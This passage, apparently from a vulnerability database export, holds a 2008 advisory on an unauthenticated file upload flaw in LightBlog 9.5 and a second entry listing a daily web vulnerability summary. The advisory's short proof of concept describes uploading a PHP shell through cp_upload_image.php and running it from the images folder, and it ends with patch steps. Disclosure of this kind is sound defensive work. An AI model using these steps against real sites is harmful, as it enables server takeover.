omni[at]NOSPAMplayhack[dot]\r\nTeam : Playhack.net Security\r\n\r\n\r\n2) Security Issues\r\n-------------------\r\n\r\n\r\n--- [ Remote File Upload Vulnerability ] ---\r\n===============================================\r\nA remote file upload vulnerability is present in LightBlog version 9.5.\r\nUsers without permissions are able to upload any kind of files, also .php; so the attacker can upload their own remote PHP\r\nshell.\r\nThe file vulnerable is: cp_upload_image.php, and you can find it under the root directory of the blog uploaded. 
(shown\r\nin the section PoC).\r\n\r\n\r\n--- [ PoC ] ---\r\n===============\r\nhttp://localhost/light/cp_upload_image.php\r\nJust look for your PHP shell, upload it (shell.php) and then use it:\r\nhttp://localhost/light/images/shell.php\r\n\r\n\r\n--- [ Patch ] ---\r\n===============\r\n- Edit the source code.\r\n- use CHMOD\r\n- Delete cp_upload_image.php\r\n- Use the vendor patch.", "modified": "2008-02-01T00:00:00", "published": "2008-02-01T00:00:00", "id": "SECURITYVULNS:DOC:18989", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18989", "title": "LightBlog Remote File Upload Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:28", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2008-02-01T00:00:00", "published": "2008-02-01T00:00:00", "id": "SECURITYVULNS:VULN:8626", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8626", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}